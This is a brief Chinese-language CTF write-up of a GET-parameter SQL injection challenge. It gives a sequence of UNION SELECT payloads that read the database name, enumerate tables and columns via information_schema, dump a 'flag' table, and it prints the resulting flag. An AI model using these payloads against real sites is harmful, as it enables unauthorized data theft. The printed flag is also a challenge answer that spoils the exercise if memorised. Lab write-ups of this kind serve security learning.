普通的get注入
首先这是这道题
我们点击去
发现有一个可以提交数据的地方,对于常见的漏洞来说,可以提交数据的地方就是可以控制输入的地方,就有可能存在漏洞,而且我们从网页上看到他显示的有四条数据 可以构造语句如下:1 ' union select 1,2,3,database()#我们直接试一下sql注入语句
则·当前数据库为pentesterlab
我们再爆一下表1 ' union select 1,2,3,table_name from information_schema.tables where table_schema='pentesterlab'#
可以看到有一个flag表 我们爆一下列
1 ' union select 1,2,3,column_name from information_schema.columns where table_name='flag'#
爆字段1 ' union select 1,2,3,flag from flag#
flag:204f704fbbcf6acf398ffee11989b377